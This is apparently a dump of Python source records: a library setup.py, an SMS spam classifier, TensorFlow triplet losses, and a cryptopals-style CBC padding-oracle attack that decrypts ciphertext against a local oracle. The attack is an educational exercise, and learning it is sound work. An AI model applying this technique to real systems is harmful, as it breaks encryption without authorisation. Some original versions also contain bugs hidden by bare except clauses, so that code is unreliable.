    # Bug fix: the original test `major < 2 or minor < 3` wrongly rejected
    # any future major release with a small minor (e.g. 3.0 < minor 3).
    # Compare the (major, minor) tuple against the required minimum instead.
    if pybind11.version_info[:2] < min_pybind11_version:
        raise Exception(
            "autocorr requires pybind11 "
            "{0}.{1} or higher".format(*min_pybind11_version))
    return pybind11.get_include()
# C++ multi-tau correlator extension: built against the pybind11 headers and
# linked to FFTW3's OpenMP build (plus libm/libgomp).
c_mulittau = Extension(
'autocorr.cAutocorr',
sources=['src/pyMultiTau.cpp', 'src/cpu_multitau.cpp', 'src/fftautocorr.cpp'],
include_dirs=[get_pybind11_headers()],
extra_compile_args=['-std=c++11', '-fopenmp'],
libraries=['fftw3_omp', 'm', 'gomp']
)
extensions.append(c_mulittau)
# Package metadata; the version string/commands are managed by versioneer.
setup(
name='autocorr',
version=versioneer.get_version(),
cmdclass=versioneer.get_cmdclass(),
description="Library for XPCS and image autocorrelation in general",
long_description=readme,
author="BES Data Solutions Pilot",
author_email='dallan@bnl.gov',
url='https://github.com/scikit-beam/autocorr',
python_requires='>={}'.format('.'.join(str(n) for n in min_version)),
packages=find_packages(exclude=['docs', 'tests']),
entry_points={
'console_scripts': [
# 'command = some.module:some_function',
],
},
include_package_data=True,
package_data={
'autocorr': [
# When adding files here, remember to update MANIFEST.in as well,
# or else they will not be included in the distribution on PyPI!
# 'path/to/data_file',
]
},
install_requires=requirements,
license="BSD (3-clause)",
classifiers=[
'Development Status :: 2 - Pre-Alpha',
'Natural Language :: English',
'Programming Language :: Python :: 3',
],
ext_modules=extensions
)
| 31.120879 | 82 | 0.667726 | from os import path
from setuptools import setup, find_packages, Extension
import sys
import versioneer
min_pybind11_version = (2, 3)
min_version = (3, 6)
if sys.version_info < min_version:
error = """
autocorr does not support Python {0}.{1}.
Python {2}.{3} and above is required. Check your Python version like so:
python3 --version
This may be due to an out-of-date pip. Make sure you have pip >= 9.0.1.
Upgrade pip like so:
pip install --upgrade pip
""".format(*(sys.version_info[:2] + min_version))
sys.exit(error)
here = path.abspath(path.dirname(__file__))
with open(path.join(here, 'README.rst'), encoding='utf-8') as readme_file:
readme = readme_file.read()
with open(path.join(here, 'requirements.txt')) as requirements_file:
requirements = [line for line in requirements_file.read().splitlines()
if not line.startswith('#')]
extensions = []
def get_pybind11_headers():
import pybind11
major, minor, _ = pybind11.version_info
if major < 2 or minor < 3:
raise Exception(
"autocorr requires pybind11 "
"{0}.{1} or higher".format(*min_pybind11_version))
return pybind11.get_include()
c_mulittau = Extension(
'autocorr.cAutocorr',
sources=['src/pyMultiTau.cpp', 'src/cpu_multitau.cpp', 'src/fftautocorr.cpp'],
include_dirs=[get_pybind11_headers()],
extra_compile_args=['-std=c++11', '-fopenmp'],
libraries=['fftw3_omp', 'm', 'gomp']
)
extensions.append(c_mulittau)
setup(
name='autocorr',
version=versioneer.get_version(),
cmdclass=versioneer.get_cmdclass(),
description="Library for XPCS and image autocorrelation in general",
long_description=readme,
author="BES Data Solutions Pilot",
author_email='dallan@bnl.gov',
url='https://github.com/scikit-beam/autocorr',
python_requires='>={}'.format('.'.join(str(n) for n in min_version)),
packages=find_packages(exclude=['docs', 'tests']),
entry_points={
'console_scripts': [
],
},
include_package_data=True,
package_data={
'autocorr': [
]
},
install_requires=requirements,
license="BSD (3-clause)",
classifiers=[
'Development Status :: 2 - Pre-Alpha',
'Natural Language :: English',
'Programming Language :: Python :: 3',
],
ext_modules=extensions
)
| true | true |
1c331147ea30befa010f9a880e04c012fd77ed69 | 2,469 | py | Python | spam.py | redhood-97/sms.ai | 8b787e3f678003826e36e233d966c7108989354c | [
"MIT"
] | null | null | null | spam.py | redhood-97/sms.ai | 8b787e3f678003826e36e233d966c7108989354c | [
"MIT"
] | null | null | null | spam.py | redhood-97/sms.ai | 8b787e3f678003826e36e233d966c7108989354c | [
"MIT"
] | 3 | 2018-05-31T07:04:06.000Z | 2018-10-30T17:42:07.000Z |
import os, csv, re, nltk
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
from sklearn import preprocessing
from sklearn.model_selection import train_test_split
from sklearn.feature_extraction.text import CountVectorizer
from sklearn.feature_extraction.text import TfidfTransformer
from sklearn.feature_extraction.text import TfidfVectorizer
from sklearn.naive_bayes import BernoulliNB
from sklearn.metrics import confusion_matrix
from nltk.corpus import stopwords
from nltk.tokenize import word_tokenize
from nltk.stem.porter import PorterStemmer
from nltk.stem.wordnet import WordNetLemmatizer
import snowballstemmer
class spam():
    """SMS spam classification pipeline: load CSV, clean text, vectorize,
    split and fit a Bernoulli naive-Bayes model."""

    def __init__(self):
        pass

    def data_input(self, loc, filename):
        """Load the labelled SMS CSV from ``loc/filename`` into ``self.df``.

        The first CSV row is used as the header; column 'v1' (the label) is
        integer-encoded in place with a LabelEncoder.
        """
        try:
            os.chdir(loc)
            # Context manager closes the handle; the original leaked it.
            with open(filename, 'r') as f:
                rows = list(csv.reader(f, delimiter=','))
            # NOTE(review): np.array assumes every row has the same number of
            # columns -- confirm for the input CSV.
            df = pd.DataFrame(np.array(rows))
            df.columns = df.iloc[0]   # first row carries the column names
            df = df[1:]
            le = preprocessing.LabelEncoder()
            le.fit(df['v1'])
            df['v1'] = le.transform(df['v1'])   # label column -> integers
            print(df.shape)
            self.df = df
        except IOError:
            print('PROBLEM READING: ' + filename)

    def data_cleaning(self):
        """Normalize the message column 'v2' into ``self.corpus``.

        Each message is stripped to letters, lower-cased, stop-word filtered,
        lemmatized and then snowball-stemmed.
        """
        stop = set(stopwords.words('english'))
        lmtzr = WordNetLemmatizer()
        stemmer = snowballstemmer.stemmer('english')
        messages = np.array(self.df.v2)
        self.corpus = []
        for i in range(len(self.df.v2)):
            review = re.sub('[^a-zA-Z]', ' ', messages[i])
            words = [w for w in review.lower().split() if w not in stop]
            lemmas = [lmtzr.lemmatize(w) for w in words]
            stems = stemmer.stemWords(lemmas)
            self.corpus.append(' '.join(stems))
        print(self.corpus)

    def vectorizer(self):
        """Bag-of-words encode the cleaned corpus into ``self.X``/``self.y``."""
        cv = CountVectorizer()
        # Bug fix: the original read ``self.coupus`` (typo) and raised
        # AttributeError; the cleaned text lives in ``self.corpus``.
        self.X = cv.fit_transform(self.corpus).toarray()
        self.y = self.df['v1']

    def data_split(self):
        """80/20 train/test split of the vectorized data onto ``self.*``."""
        self.X_train, self.X_test, self.y_train, self.y_test = train_test_split(
            self.X, self.y, test_size=0.20)

    def classifier(self):
        """Fit a Bernoulli naive-Bayes model on the training split."""
        classifier = BernoulliNB()
        classifier.fit(self.X_train, self.y_train)
if __name__ == '__main__':
    # NOTE(review): '\data' relies on Python leaving the unknown escape \d
    # intact, i.e. a Windows-style relative path -- confirm on POSIX.
    data_dir = os.getcwd() + '\data'
    # Run the whole pipeline end to end on data/spam.csv.
    pipeline = spam()
    pipeline.data_input(data_dir, 'spam.csv')
    pipeline.data_cleaning()
    pipeline.vectorizer()
    pipeline.data_split()
    pipeline.classifier()
| 20.404959 | 114 | 0.611989 |
import os, csv, re, nltk
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
from sklearn import preprocessing
from sklearn.model_selection import train_test_split
from sklearn.feature_extraction.text import CountVectorizer
from sklearn.feature_extraction.text import TfidfTransformer
from sklearn.feature_extraction.text import TfidfVectorizer
from sklearn.naive_bayes import BernoulliNB
from sklearn.metrics import confusion_matrix
from nltk.corpus import stopwords
from nltk.tokenize import word_tokenize
from nltk.stem.porter import PorterStemmer
from nltk.stem.wordnet import WordNetLemmatizer
import snowballstemmer
class spam():
def __init__(self):
pass
def data_input(self, loc, filename):
try:
os.chdir(loc)
f = open(filename, 'r')
file = csv.reader(f, delimiter = ',')
df = pd.DataFrame(np.array(list(file)))
df.columns = df.iloc[0]
df = df[1:]
le = preprocessing.LabelEncoder()
le.fit(df['v1'])
df['v1'] = le.transform(df['v1'])
print (df.shape)
self.df = df
except IOError:
print ('PROBLEM READING: ' + filename)
def data_cleaning(self):
stop = set(stopwords.words('english'))
lmtzr = WordNetLemmatizer()
stemmer = snowballstemmer.stemmer('english')
c = np.array(self.df.v2)
self.corpus = []
for i in range(len(self.df.v2)):
review = re.sub('[^a-zA-Z]', ' ', c[i])
review = [i for i in review.lower().split() if i not in stop]
l = [lmtzr.lemmatize(x) for x in review]
s = stemmer.stemWords(l)
review = ' '.join(s)
self.corpus.append(review)
print (self.corpus)
def vectorizer(self):
cv = CountVectorizer()
self.X = cv.fit_transform(self.coupus).toarray()
self.y = self.df['v1']
def data_split(self):
self.X_train, self.X_test, self.y_train, self.y_test = train_test_split(self.X, self.y, test_size = 0.20)
def classifier(self):
classifier = BernoulliNB()
classifier.fit(self.X_train, self.y_train)
if __name__ == '__main__':
loc = os.getcwd() + '\data'
filename = 'spam.csv'
s = spam()
s.data_input(loc, filename)
s.data_cleaning()
s.vectorizer()
s.data_split()
s.classifier()
| true | true |
1c3312ed599f7e848d662a175adb396479227a15 | 4,281 | py | Python | set3/CBC_padding_oracle.py | nahgil2614/cryptopals | e1c83d07dacb1c159ab1bbc0532eca8200dedca0 | [
"MIT"
] | null | null | null | set3/CBC_padding_oracle.py | nahgil2614/cryptopals | e1c83d07dacb1c159ab1bbc0532eca8200dedca0 | [
"MIT"
] | null | null | null | set3/CBC_padding_oracle.py | nahgil2614/cryptopals | e1c83d07dacb1c159ab1bbc0532eca8200dedca0 | [
"MIT"
] | null | null | null | import base64
import random
import time
from PKCS7 import valid_pad
from PKCS7 import PKCS7_pad as pad
from AES_CBC import Ciphers
from AES_CBC import InvCiphers
from AES_CBC import KeyExpansion
# --- module-level secrets (fixed for this process) ---
randKey = bytes([random.getrandbits(8) for i in range(16)])
# Expanded AES key schedule consumed by Ciphers/InvCiphers.
w = KeyExpansion( randKey )
# IV kept as a 16-char string of codepoints 0-255 (str2bytes converts it).
IV = ''.join([chr(random.getrandbits(8)) for i in range(16)])
# The attacker has control of the ciphertext, the IV and the padding_oracle.
def str2bytes(string):
    """Encode a text string to bytes, one byte per character ordinal
    (only valid for codepoints 0-255)."""
    return bytes(map(ord, string))
def random_CBC_cipher():
    """Pick a random line of '17.txt', base64-decode it, and return it
    CBC-encrypted (PKCS#7-padded) under the module key/IV.

    Also prints the plaintext with a hex column ruler underneath -- debug
    output only, not part of the attack surface.
    """
    num = random.randint(1, 10)
    # Bug fix: the original never closed the file handle; `with` does.
    with open('17.txt', 'r') as f:
        for count, line in enumerate(f, start=1):
            if count == num:
                break
    line = base64.b64decode(line.replace('\n', '').encode('ascii'))
    print(line)

    # Hex ruler 0123...f0123... aligned under the plaintext characters.
    i = 0
    track_num = ''
    while len(track_num) != len(line):
        track_num += hex(i).replace('0x', '')
        i = (i + 1) % 16
    print(' ' + track_num)
    print('==== This part is just for debugging, real program down here ↓↓↓ ====\n')

    return str2bytes(Ciphers(pad(line, 16), w, IV))
def padding_oracle(cipher):
    """Return True iff `cipher` decrypts (under the fixed key/IV) to a
    plaintext with a valid PKCS#7 pad -- the only bit the attacker observes.
    (An early version of valid_pad even accepted '\\x00' padding.)"""
    plaintext = InvCiphers(cipher, w, IV)
    return valid_pad(str2bytes(plaintext), 16)
def XOR(block1, block2):
    """Byte-wise XOR of two byte strings, truncated to the shorter one."""
    return bytes(a ^ b for a, b in zip(block1, block2))
def padOf(num):
    """PKCS#7 padding block of length `num`: `num` bytes of value `num`."""
    return bytes([num]) * num
def main():
# CBC padding-oracle attack (cryptopals set 3, challenge 17): recover the
# plaintext using only padding_oracle() responses, one block at a time.
# NOTE(review): leading indentation was stripped from this dump, so the
# loop/branch nesting below is ambiguous; code left byte-identical.
cipher = random_CBC_cipher()
print('cipher:', cipher)
print('IV:', str2bytes(IV), end = '\n\n')
print('This is all you have (and a padding_oracle, of course!). Now cracking the cipher...')
## Inner mechanism >>
plain = b''
# C1 is the block (or IV) XORed into the decryption of C2, so tampering
# with C1's bytes exposes D(C2) through the oracle's pad verdict.
C2 = str2bytes(IV)
print('cipher\'s length: ' + str(len(cipher)))
for t in range(0, len(cipher), 16):
print('\n\n**** BLOCK NO.' + str(t//16) + ' ****')
C1 = C2
C2 = cipher[t:t+16]
original_C1 = C1
DC2 = b'' #decrypted ciphertext
#so I have to take care of the first two rounds because this attack relies on the
#hope that first round will make P1+P2 has a valid padding ('\x01')
#but it could also be ('\x02\x02', '\x03\x03\x03', &c)
#so only the second round need Loop_detection_agent
# NOTE: THE LINE 'decoded P1 + P2: '... IS USED JUST FOR DEBUGGING PURPOSE
#first round: brute-force the last byte; every C1 the oracle accepts is a
#candidate (a true '\x01' pad or an accidental longer pad).
print('FIRST ROUND >>')
wanted_C1 = []
for i in range(256):
if padding_oracle( C1 + C2 ):
wanted_C1 += [C1]
DC2 = bytes([C1[15] ^ 1]) + DC2
print( XOR(original_C1[15:], DC2) )
print( str2bytes('decoded P1 + P2: ' + InvCiphers( C1 + C2, w, IV )) )
C1 = C1[:15] + bytes([(C1[15] + 1) % 256])
#second round: try each candidate; force a '\x02\x02' pad and brute-force
#byte 14. A candidate that loops through all 256 values twice was a false
#positive (looped flag) and the next candidate is tried.
for C1 in wanted_C1:
DC2 = bytes([C1[15] ^ 1]) + DC2
print('\nSECOND ROUND >>')
looped = False
C1 = C1[:15] + XOR(DC2, b'\x02')
loop_count = 0
while not padding_oracle( C1 + C2 ):
C1 = C1[:14] + bytes([(C1[14]+1) % 256]) + C1[15:]
if C1[14] == 0:
loop_count += 1
if loop_count >= 2:
looped = True
break
DC2 = bytes([C1[14] ^ 2]) + DC2
print( XOR(original_C1[14:], DC2) )
print( str2bytes('decoded P1 + P2: ' + InvCiphers( C1 + C2, w, IV )) )
if looped == False:
break
#latter rounds: bytes 13..0 -- force a pad of (16-i) from the known DC2
#suffix and brute-force the single unknown byte C1[i].
print('\nLATTER ROUNDS >>')
for i in range(13,-1,-1):
C1 = C1[:i+1] + XOR(DC2, padOf(16-i)[1:])
while not padding_oracle( C1 + C2 ):
C1 = C1[:i] + bytes([(C1[i]+1) % 256]) + C1[i+1:]
DC2 = bytes([C1[i] ^ (16-i)]) + DC2
print( XOR(original_C1[i:], DC2) )
print( str2bytes('decoded P1 + P2: ' + InvCiphers( C1 + C2, w, IV )) )
# Recovered plaintext block = D(C2) XOR original C1.
plain += XOR(original_C1, DC2)
print(plain)
if __name__ == '__main__':
main()
| 32.679389 | 97 | 0.512731 | import base64
import random
import time
from PKCS7 import valid_pad
from PKCS7 import PKCS7_pad as pad
from AES_CBC import Ciphers
from AES_CBC import InvCiphers
from AES_CBC import KeyExpansion
randKey = bytes([random.getrandbits(8) for i in range(16)])
w = KeyExpansion( randKey )
IV = ''.join([chr(random.getrandbits(8)) for i in range(16)])
def str2bytes( string ):
return bytes([ord(ltr) for ltr in string])
def random_CBC_cipher():
f = open('17.txt', 'r')
num = random.randint(1,10)
count = 0
for line in f:
count += 1
if count == num:
break
line = line.replace('\n','').encode('ascii')
line = base64.b64decode( line )
print(line)
i = 0
track_num = ''
while len(track_num) != len(line):
track_num += hex(i).replace('0x','')
i = (i+1) % 16
print(' ' + track_num)
print('==== This part is just for debugging, real program down here ↓↓↓ ====\n')
cipher = str2bytes(Ciphers( pad(line, 16), w, IV ))
return cipher
def padding_oracle( cipher ):
return valid_pad( str2bytes(InvCiphers( cipher, w, IV )), 16 )
def XOR( block1, block2 ):
return bytes([x^y for x,y in zip(block1, block2)])
def padOf( num ):
return bytes([num for i in range(num)])
def main():
cipher = random_CBC_cipher()
print('cipher:', cipher)
print('IV:', str2bytes(IV), end = '\n\n')
print('This is all you have (and a padding_oracle, of course!). Now cracking the cipher...')
C2 = str2bytes(IV)
print('cipher\'s length: ' + str(len(cipher)))
for t in range(0, len(cipher), 16):
print('\n\n**** BLOCK NO.' + str(t//16) + ' ****')
C1 = C2
C2 = cipher[t:t+16]
original_C1 = C1
DC2 = b'' #decrypted ciphertext
#so I have to take care of the first two rounds because this attack relies on the
#hope that first round will make P1+P2 has a valid padding ('\x01')
#but it could also be ('\x02\x02', '\x03\x03\x03', &c)
#so only the second round need Loop_detection_agent
# NOTE: THE LINE 'decoded P1 + P2: '... IS USED JUST FOR DEBUGGING PURPOSE
#first round
print('FIRST ROUND >>')
wanted_C1 = []
for i in range(256):
if padding_oracle( C1 + C2 ):
wanted_C1 += [C1]
DC2 = bytes([C1[15] ^ 1]) + DC2
print( XOR(original_C1[15:], DC2) )
print( str2bytes('decoded P1 + P2: ' + InvCiphers( C1 + C2, w, IV )) )
C1 = C1[:15] + bytes([(C1[15] + 1) % 256])
#second round
for C1 in wanted_C1:
DC2 = bytes([C1[15] ^ 1]) + DC2
print('\nSECOND ROUND >>')
looped = False
C1 = C1[:15] + XOR(DC2, b'\x02')
loop_count = 0
while not padding_oracle( C1 + C2 ):
C1 = C1[:14] + bytes([(C1[14]+1) % 256]) + C1[15:]
if C1[14] == 0:
loop_count += 1
if loop_count >= 2:
looped = True
break
DC2 = bytes([C1[14] ^ 2]) + DC2
print( XOR(original_C1[14:], DC2) )
print( str2bytes('decoded P1 + P2: ' + InvCiphers( C1 + C2, w, IV )) )
if looped == False:
break
#latter rounds
print('\nLATTER ROUNDS >>')
for i in range(13,-1,-1):
C1 = C1[:i+1] + XOR(DC2, padOf(16-i)[1:])
while not padding_oracle( C1 + C2 ):
C1 = C1[:i] + bytes([(C1[i]+1) % 256]) + C1[i+1:]
DC2 = bytes([C1[i] ^ (16-i)]) + DC2
print( XOR(original_C1[i:], DC2) )
print( str2bytes('decoded P1 + P2: ' + InvCiphers( C1 + C2, w, IV )) )
plain += XOR(original_C1, DC2)
print(plain)
if __name__ == '__main__':
main()
| true | true |
1c3314374f8fb01f613de63c5fa967af3b8e0188 | 7,367 | py | Python | trainer/loss.py | keshav47/mildnet | c5a95da78039bea605b75ce3ed2af6fe310f36f6 | [
"Apache-2.0"
] | 77 | 2019-03-07T12:18:47.000Z | 2022-03-28T08:21:55.000Z | trainer/loss.py | keshav47/mildnet | c5a95da78039bea605b75ce3ed2af6fe310f36f6 | [
"Apache-2.0"
] | 23 | 2019-05-17T11:23:02.000Z | 2022-03-11T23:42:29.000Z | trainer/loss.py | keshav47/mildnet | c5a95da78039bea605b75ce3ed2af6fe310f36f6 | [
"Apache-2.0"
] | 29 | 2019-03-11T02:41:42.000Z | 2022-02-07T15:37:24.000Z | from tensorflow.keras import backend as K
import tensorflow as tf
# Keras fuzz factor; every loss below clips y_pred into
# [_EPSILON, 1 - _EPSILON] before taking sqrt/log to avoid NaNs.
_EPSILON = K.epsilon()
def hinge_loss_fn(batch_size):
    """Build a triplet hinge loss over (query, positive, negative) embedding
    triplets packed consecutively along the batch axis."""
    def hinge_loss(y_true, y_pred):
        y_pred = K.clip(y_pred, _EPSILON, 1.0 - _EPSILON)
        total = tf.convert_to_tensor(0, dtype=tf.float32)
        margin = tf.constant(1.0, shape=[1], dtype=tf.float32)
        for i in range(0, batch_size, 3):
            try:
                query = y_pred[i + 0]
                positive = y_pred[i + 1]
                negative = y_pred[i + 2]
                dist_pos = K.sqrt(K.sum((query - positive) ** 2))
                dist_neg = K.sqrt(K.sum((query - negative) ** 2))
                total = total + margin + dist_pos - dist_neg
            except:
                # Skip incomplete triplets at the end of a ragged batch.
                continue
        total = total / (batch_size / 3)
        floor = tf.constant(0.0, shape=[1], dtype=tf.float32)
        return tf.maximum(total, floor)
    return hinge_loss
def hinge_new_loss_fn(batch_size):
    """Build a two-sided triplet hinge loss: the positive must sit close to
    the query while the negative stays far from both query and positive."""
    def hinge_new_loss(y_true, y_pred):
        y_pred = K.clip(y_pred, _EPSILON, 1.0 - _EPSILON)
        total = tf.convert_to_tensor(0, dtype=tf.float32)
        margin = tf.constant(1.0, shape=[1], dtype=tf.float32)
        for i in range(0, batch_size, 3):
            try:
                query = y_pred[i + 0]
                positive = y_pred[i + 1]
                negative = y_pred[i + 2]
                dist_qp = K.sqrt(K.sum((query - positive) ** 2))
                dist_qn = K.sqrt(K.sum((query - negative) ** 2))
                dist_pn = K.sqrt(K.sum((positive - negative) ** 2))
                # Two hinge terms, one shared margin: (q,p)-(q,n) and (q,p)-(p,n).
                total = total + margin + dist_qp - dist_qn + dist_qp - dist_pn
            except:
                continue
        total = total / (batch_size / 6)
        floor = tf.constant(0.0, shape=[1], dtype=tf.float32)
        return tf.maximum(total, floor)
    return hinge_new_loss
def hinge_twice_loss_fn(batch_size):
    """Build the same triplet hinge as hinge_loss_fn but averaged over
    batch_size/6 instead of batch_size/3.

    NOTE(review): the loop still sums batch_size/3 margin terms, so the /6
    divisor doubles the averaged value -- presumably the intent behind
    'twice'; confirm with the training configuration.
    """
    def hinge_twice_loss(y_true, y_pred):
        y_pred = K.clip(y_pred, _EPSILON, 1.0 - _EPSILON)
        total = tf.convert_to_tensor(0, dtype=tf.float32)
        margin = tf.constant(1.0, shape=[1], dtype=tf.float32)
        for i in range(0, batch_size, 3):
            try:
                query = y_pred[i + 0]
                positive = y_pred[i + 1]
                negative = y_pred[i + 2]
                dist_pos = K.sqrt(K.sum((query - positive) ** 2))
                dist_neg = K.sqrt(K.sum((query - negative) ** 2))
                total = total + margin + dist_pos - dist_neg
            except:
                continue
        total = total / (batch_size / 6)
        floor = tf.constant(0.0, shape=[1], dtype=tf.float32)
        return tf.maximum(total, floor)
    return hinge_twice_loss
def contrastive_loss_fn(batch_size):
    """Build a contrastive loss over packed (q, p, n) triplets: each triplet
    contributes one similar pair (q, p) and one dissimilar pair (q, n)."""
    def contrastive_loss(y_true, y_pred):
        def _pair_loss(label, dist):
            one = tf.constant(1.0, shape=[1], dtype=tf.float32)
            # label==1: penalize distance; label==0: penalize margin shortfall.
            return K.mean(label * K.square(dist) +
                          (one - label) * K.square(K.maximum(one - dist, 0)))

        y_pred = K.clip(y_pred, _EPSILON, 1.0 - _EPSILON)
        total = tf.convert_to_tensor(0, dtype=tf.float32)
        similar = tf.constant(1.0, shape=[1], dtype=tf.float32)
        dissimilar = tf.constant(0.0, shape=[1], dtype=tf.float32)
        for i in range(0, batch_size, 3):
            try:
                query = y_pred[i + 0]
                positive = y_pred[i + 1]
                negative = y_pred[i + 2]
                dist_pos = K.sqrt(K.sum((query - positive) ** 2))
                dist_neg = K.sqrt(K.sum((query - negative) ** 2))
                total = (total + _pair_loss(similar, dist_pos)
                         + _pair_loss(dissimilar, dist_neg))
            except:
                continue
        total = total / (batch_size * 2 / 3)
        floor = tf.constant(0.0, shape=[1], dtype=tf.float32)
        return tf.maximum(total, floor)
    return contrastive_loss
def lossless_loss_fn(batch_size):
    """Build the 'lossless' triplet loss (log-scaled distances bounded by the
    embedding dimension N).

    Reference: https://towardsdatascience.com/lossless-triplet-loss-7e932f990b24
    """
    def lossless_loss(y_true, y_pred):
        N = tf.constant(4096.0, shape=[1], dtype=tf.float32)
        beta = tf.constant(4096.0, shape=[1], dtype=tf.float32)
        y_pred = K.clip(y_pred, _EPSILON, 1.0 - _EPSILON)
        loss = tf.convert_to_tensor(0, dtype=tf.float32)
        g = tf.constant(1.0, shape=[1], dtype=tf.float32)
        const1 = tf.constant(1.0, shape=[1], dtype=tf.float32)
        for i in range(0, batch_size, 3):
            try:
                anchor = y_pred[i + 0]
                positive = y_pred[i + 1]
                negative = y_pred[i + 2]
                pos_dist = K.sum(K.square(anchor - positive), 1)
                # Bug fix: K.square takes ONE tensor; the original passed
                # (anchor, negative) as two arguments instead of the difference.
                neg_dist = K.sum(K.square(anchor - negative), 1)
                # Bug fixes: `epsilon` was an undefined name (the NameError was
                # silently swallowed by the bare except), and tf.log is the
                # removed TF1 spelling -- this file imports tensorflow.keras,
                # so use tf.math.log and the module's _EPSILON.
                pos_dist = -tf.math.log(-tf.divide(pos_dist, beta) + const1 + _EPSILON)
                neg_dist = -tf.math.log(-tf.divide(N - neg_dist, beta) + const1 + _EPSILON)
                _loss = neg_dist + pos_dist
                loss = (loss + g + _loss)
            except:
                continue
        loss = loss / (batch_size / 3)
        zero = tf.constant(0.0, shape=[1], dtype=tf.float32)
        return tf.maximum(loss, zero)
    return lossless_loss
def angular_loss_1_fn(batch_size):
    """Build the per-triplet angular loss: the negative is penalized by its
    (tan-scaled) squared offset from the anchor/positive midpoint."""
    def angular_loss_1(y_true, y_pred):
        y_pred = K.clip(y_pred, _EPSILON, 1.0 - _EPSILON)
        total = tf.convert_to_tensor(0, dtype=tf.float32)
        one = tf.constant(1.0, shape=[1], dtype=tf.float32)
        four = tf.constant(4.0, shape=[1], dtype=tf.float32)
        alpha = tf.constant(45.0, shape=[1], dtype=tf.float32)
        for i in range(0, batch_size, 3):
            try:
                xa = y_pred[i + 0]
                xp = y_pred[i + 1]
                xn = y_pred[i + 2]
                midpoint = (xa + xp) / 2
                term = K.square(xa - xp) - four * (tf.tan(alpha * K.square(xn - midpoint)) ** 2)
                floor = tf.constant(0.0, shape=[1], dtype=tf.float32)
                total = total + one + tf.maximum(term, floor)
            except:
                continue
        return total / (batch_size / 3)
    return angular_loss_1
def angular_loss_2_fn(batch_size):
    """Build the batch (N-pair) form of the angular loss with an auxiliary
    triplet log-sum-exp term, averaged over batch_size/3 triplets."""
    def angular_loss_2(y_true, y_pred):
        y_pred = K.clip(y_pred, _EPSILON, 1.0 - _EPSILON)
        g = tf.constant(1.0, shape=[1], dtype=tf.float32)
        c = tf.constant(4.0, shape=[1], dtype=tf.float32)
        d = tf.constant(2.0, shape=[1], dtype=tf.float32)
        alpha = tf.constant(45.0, shape=[1], dtype=tf.float32)
        losses = []
        losses2 = []
        for i in range(0, batch_size, 3):
            try:
                xa = y_pred[i + 0]
                xp = y_pred[i + 1]
                xn = y_pred[i + 2]
                # f(a,p,n) from the angular-loss formulation.
                fapn = (c * (tf.tan(alpha * K.transpose(xa + xp) * xn) ** 2)
                        - d * (g + tf.tan(alpha) ** 2) * K.transpose(xa) * xp)
                losses.append(fapn)
                losses2.append(K.transpose(xa) * xn - K.transpose(xa) * xp)
                # Bug fix: the original next executed `loss = (loss + g + _loss)`
                # with both names undefined; the NameError was silently swallowed
                # by the bare except each iteration. The accumulator was dead
                # anyway (loss is recomputed from `losses` below), so the broken
                # statement is removed.
            except:
                continue
        loss = K.sum(K.log(1 + 2 * K.sum([K.exp(v) for v in losses])))
        loss2 = K.sum(K.log(1 + 2 * K.sum([K.exp(v) for v in losses2])))
        loss = loss + 2 * loss2
        loss = loss / (batch_size / 3)
        zero = tf.constant(0.0, shape=[1], dtype=tf.float32)
        return tf.maximum(loss, zero)
    return angular_loss_2
import tensorflow as tf
_EPSILON = K.epsilon()
def hinge_loss_fn(batch_size):
def hinge_loss(y_true, y_pred):
y_pred = K.clip(y_pred, _EPSILON, 1.0-_EPSILON)
loss = tf.convert_to_tensor(0,dtype=tf.float32)
g = tf.constant(1.0, shape=[1], dtype=tf.float32)
for i in range(0, batch_size, 3):
try:
q_embedding = y_pred[i+0]
p_embedding = y_pred[i+1]
n_embedding = y_pred[i+2]
D_q_p = K.sqrt(K.sum((q_embedding - p_embedding)**2))
D_q_n = K.sqrt(K.sum((q_embedding - n_embedding)**2))
loss = (loss + g + D_q_p - D_q_n)
except:
continue
loss = loss/(batch_size/3)
zero = tf.constant(0.0, shape=[1], dtype=tf.float32)
return tf.maximum(loss,zero)
return hinge_loss
def hinge_new_loss_fn(batch_size):
def hinge_new_loss(y_true, y_pred):
y_pred = K.clip(y_pred, _EPSILON, 1.0-_EPSILON)
loss = tf.convert_to_tensor(0,dtype=tf.float32)
g = tf.constant(1.0, shape=[1], dtype=tf.float32)
for i in range(0, batch_size, 3):
try:
q_embedding = y_pred[i+0]
p_embedding = y_pred[i+1]
n_embedding = y_pred[i+2]
D_q_p = K.sqrt(K.sum((q_embedding - p_embedding)**2))
D_q_n = K.sqrt(K.sum((q_embedding - n_embedding)**2))
D_p_n = K.sqrt(K.sum((p_embedding - n_embedding)**2))
loss = (loss + g + D_q_p - D_q_n + D_q_p - D_p_n)
except:
continue
loss = loss/(batch_size/6)
zero = tf.constant(0.0, shape=[1], dtype=tf.float32)
return tf.maximum(loss,zero)
return hinge_new_loss
def hinge_twice_loss_fn(batch_size):
def hinge_twice_loss(y_true, y_pred):
y_pred = K.clip(y_pred, _EPSILON, 1.0-_EPSILON)
loss = tf.convert_to_tensor(0,dtype=tf.float32)
g = tf.constant(1.0, shape=[1], dtype=tf.float32)
for i in range(0, batch_size, 3):
try:
q_embedding = y_pred[i+0]
p_embedding = y_pred[i+1]
n_embedding = y_pred[i+2]
D_q_p = K.sqrt(K.sum((q_embedding - p_embedding)**2))
D_q_n = K.sqrt(K.sum((q_embedding - n_embedding)**2))
loss = (loss + g + D_q_p - D_q_n)
except:
continue
loss = loss/(batch_size/6)
zero = tf.constant(0.0, shape=[1], dtype=tf.float32)
return tf.maximum(loss,zero)
return hinge_twice_loss
def contrastive_loss_fn(batch_size):
def contrastive_loss(y_true, y_pred):
def _contrastive_loss(y1, D):
g = tf.constant(1.0, shape=[1], dtype=tf.float32)
return K.mean(y1 * K.square(D) +
(g - y1) * K.square(K.maximum(g - D, 0)))
y_pred = K.clip(y_pred, _EPSILON, 1.0-_EPSILON)
loss = tf.convert_to_tensor(0,dtype=tf.float32)
g = tf.constant(1.0, shape=[1], dtype=tf.float32)
h = tf.constant(0.0, shape=[1], dtype=tf.float32)
for i in range(0,batch_size,3):
try:
q_embedding = y_pred[i+0]
p_embedding = y_pred[i+1]
n_embedding = y_pred[i+2]
D_q_p = K.sqrt(K.sum((q_embedding - p_embedding)**2))
D_q_n = K.sqrt(K.sum((q_embedding - n_embedding)**2))
L_q_p = _contrastive_loss(g, D_q_p)
L_q_n = _contrastive_loss(h, D_q_n)
loss = (loss + L_q_p + L_q_n )
except:
continue
loss = loss/(batch_size*2/3)
zero = tf.constant(0.0, shape=[1], dtype=tf.float32)
return tf.maximum(loss,zero)
